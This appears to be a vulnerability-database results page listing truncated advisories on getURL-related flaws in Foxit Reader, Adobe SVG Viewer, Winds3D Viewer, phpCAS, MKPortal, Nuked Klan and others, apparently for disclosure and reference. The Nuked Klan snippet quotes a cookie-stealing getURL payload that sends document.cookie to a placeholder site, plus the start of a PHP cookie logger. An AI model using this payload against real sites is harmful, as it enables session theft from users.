Lucene search
K

35 matches found

Zero Day Initiative
Zero Day Initiative
added 2017/04/21 12:0 a.m.14 views

Foxit Reader getURL Use-After-Free Remote Code Execution Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the getURL method...

6.8CVSS7AI score
Exploits0References1
seebug.org
seebug.org
added 2014/07/01 12:0 a.m.17 views

Adobe SVG Viewer 3.0 postURL/getURL Restriction Bypass Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/8785/info Adobe SVG Viewer ASV is prone to an issue in the implementation of the getURL and postURL methods. These methods are designed to prevent access to URIs in a foreign domain or local files. However, by using a...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2014/06/02 12:0 a.m.17 views

CmsEasy最新版本前台SQL注射 (2)

简要描述: 这几天在尝试做一款PHP源码审计工具,匹配一些初步的规则时扫出来的,并非针对,感谢CmsEasy 详细说明: 还是INSERT注入,/index.php下有一个stats::getbot;这个方法在做什么呐? /lib/table/stats.php public static function getbot $ServerName = $SERVER"SERVERNAME"; $ServerPort = $SERVER"SERVERPORT"; $ScriptName = $SERVER"SCRIPTNAME"; $QueryString =...

7.1AI score
Exploits0
Packet Storm
Packet Storm
added 2013/06/30 12:0 a.m.24 views

Xorbin Digital Flash Clock 1.0 For WordPress XSS

==================================================================== Xorbin Digital Flash Clock 1.0 Plugin for Wordpress Flash-based XSS ==================================================================== Description: This plugin displays digital flash clock on your website. It's easy to use and...

0.2AI score0.00261EPSS
Exploits2
NVD
NVD
added 2010/10/07 9:0 p.m.19 views

CVE-2010-3690

Multiple cross-site scripting XSS vulnerabilities in phpCAS before 1.1.3, when proxy mode is enabled, allow remote attackers to inject arbitrary web script or HTML via 1 a crafted Proxy Granting Ticket IOU PGTiou parameter to the callback function in client.php, 2 vectors involving functions that...

4.3CVSS5.5AI score0.01041EPSS
Exploits0References20
UbuntuCve
UbuntuCve
added 2010/10/07 9:0 p.m.19 views

CVE-2010-3690

Multiple cross-site scripting XSS vulnerabilities in phpCAS before 1.1.3, when proxy mode is enabled, allow remote attackers to inject arbitrary web script or HTML via 1 a crafted Proxy Granting Ticket IOU PGTiou parameter to the callback function in client.php, 2 vectors involving functions that...

4.3CVSS6AI score0.01041EPSS
Exploits0References2
Prion
Prion
added 2009/07/10 3:30 p.m.16 views

Security feature bypass

Insecure method vulnerability in Awingsoft Awakening Winds3D Viewer plugin 3.5.0.0, 3.0.0.5, and possibly other versions allows remote attackers to force the download and execution of arbitrary files via the GetURL method...

9.3CVSS7.1AI score0.05336EPSS
Exploits3References4Affected Software1
Cvelist
Cvelist
added 2009/07/10 3:0 p.m.17 views

CVE-2009-2386

Insecure method vulnerability in Awingsoft Awakening Winds3D Viewer plugin 3.5.0.0, 3.0.0.5, and possibly other versions allows remote attackers to force the download and execution of arbitrary files via the GetURL method...

6.8AI score0.05336EPSS
Exploits3References4
CVE
CVE
added 2009/07/10 3:0 p.m.49 views

CVE-2009-2386

The CVE-2009-2386 entry concerns Awingsoft Awakening Winds3D Viewer plugin (Winds3D Viewer) for/versions 3.5.0.0 and 3.0.0.5 (and possibly others). The vulnerability lies in the GetURL method, which insecurely downloads and executes arbitrary files when invoked, allowing remote attackers to trigg...

9.3CVSS6.9AI score0.05336EPSS
Exploits3References4Affected Software1
seebug.org
seebug.org
added 2009/07/10 12:0 a.m.29 views

Winds3D Viewer GetURL()函数远程代码执行漏洞

BUGTRAQ ID: 35595 CVECAN ID: CVE-2009-2386 Awakening是一个功能强大的实时3D解决方案,Winds3D Viewer是Awakening的浏览器插件。 Winds3D Viewer以不安全的方式实现了GetURL函数: /----------- GetURLstring URL Description: Open browser to visit assigned URL returns: None - -----------/ 调用GetURL最终会执行相当于“ShellExecuteNULL, "open", URL, 0, 0,...

9.3CVSS6.4AI score0.05336EPSS
Exploits3
CVE
CVE
added 2007/01/11 2:0 a.m.46 views

CVE-2007-0192

The CVE-2007-0192 CSRF vulnerability affects MKPortal’s admin.php in the save_main operation (ad_perms) where an attacker can induce privilege changes. The issue is exposed via a crafted getURL in a .swf loaded in an IFRAME, enabling remote modification of privilege settings (All Guests are Admin...

7.5CVSS6.9AI score0.00717EPSS
Exploits0References3Affected Software1
CVE
CVE
added 2007/01/05 11:0 a.m.43 views

CVE-2007-0083

CVE-2007-0083 affects Nuked Klan 1.7 and earlier. The vulnerability is a cross-site scripting (XSS) flaw exploitable via a javascript: URI in a getURL statement within a .swf file, enabling remote script/HTML injection as demonstrated by “Remote Cookie Disclosure.” The NVD entry lists a CVSS v2 b...

6.8CVSS5.7AI score0.01009EPSS
Exploits0References4Affected Software1
seebug.org
seebug.org
added 2007/01/05 12:0 a.m.26 views

Nuked Klan任意.SWF文件COOKIE窃取漏洞

Nuked Klan是一款基于ASP的WEB应用程序。 Nuked Klan处理.swf文件存在问题,远程攻击者可以利用漏洞获取其他目标用户的敏感COOKIE信息。 构建一个.swf文件,放置如下代码: getURL"javascript:alert'document.location="http://site.com/cookie.php? cookie="+document.cookie';"; 或者 ?php $cookie = $GET'cookie'; $ip = getenv 'REMOTEADDR'; $date=date"m/d/Y g:i:s a";...

7.1AI score
Exploits0
myhack58
myhack58
added 2006/07/19 12:0 a.m.74 views

The use of Sina, Sohu domain steering-vulnerability warning-the black bar safety net

Article author: light and shadow Sources of information: the Red wolf security group www.wolfexp.net) To 1. Sina blog is an unfiltered script That simple point of it, the previous time to engage google cheat time want to use sina domain name turning. Because the blog's pr value is generally high,...

7.3AI score
Exploits0
exploitpack
exploitpack
added 2003/10/07 12:0 a.m.17 views

Adobe SVG Viewer 3.0 - postURLgetURL Restriction Bypass

Adobe SVG Viewer 3.0 - postURLgetURL Restriction Bypass source: https://www.securityfocus.com/bid/8785/info Adobe SVG Viewer ASV is prone to an issue in the implementation of the getURL and postURL methods. These methods are designed to prevent access to URIs in a foreign domain or local files...

7.3AI score
Exploits0
Rows per page
Query Builder